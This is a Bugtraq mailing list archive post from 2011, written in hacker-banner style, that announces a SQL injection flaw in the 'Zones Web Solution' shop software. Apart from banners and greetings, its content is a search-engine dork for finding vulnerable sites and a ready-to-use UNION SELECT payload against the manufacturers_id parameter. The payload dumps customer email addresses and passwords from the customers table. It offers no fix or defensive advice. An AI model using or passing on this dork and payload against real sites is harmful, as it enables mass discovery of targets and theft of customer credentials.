Bugtraq mailing list archives
Zones Web Solution (index.php?manufacturers_id) Remote SQL injection Vulnerability
From: ehsan_hp200 () hotmail com
Date: Tue, 26 Jul 2011 08:25:08 GMT
############################### IRANIAN THE BEST HACKERS IN THE WORLD ################## #################### #################### ## ## Remote SQL injection Vulnerability ## ## Zones Web Solution (index.php?manufacturers_id) ## ############################################################### ############################################################### ############################################################### ############################################################### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : Ehsan_Hp200 () Hotmail com ## ## Vendor : http://www.zones.in/ ## ## Persian Gulf 4 Ever! ############################# ############################# ############################# ############################# ############################# ## ## Dork : "Powered By : Zones Web Solution" "inurl:index.php?manufacturers_id='" Exploite: www.victim.com/index.php?manufacturers_id=-1 union select concat(customers_email_address,0x3a,customers_password) from customers ######################################################################################### SpeCial TanX To : Dj7Xpl ########################################################################################## ############################### IRANIAN THE BEST HACKERS IN THE WORLD ##################
Current thread:
- Zones Web Solution (index.php?manufacturers_id) Remote SQL injection Vulnerability ehsan_hp200 (Jul 26)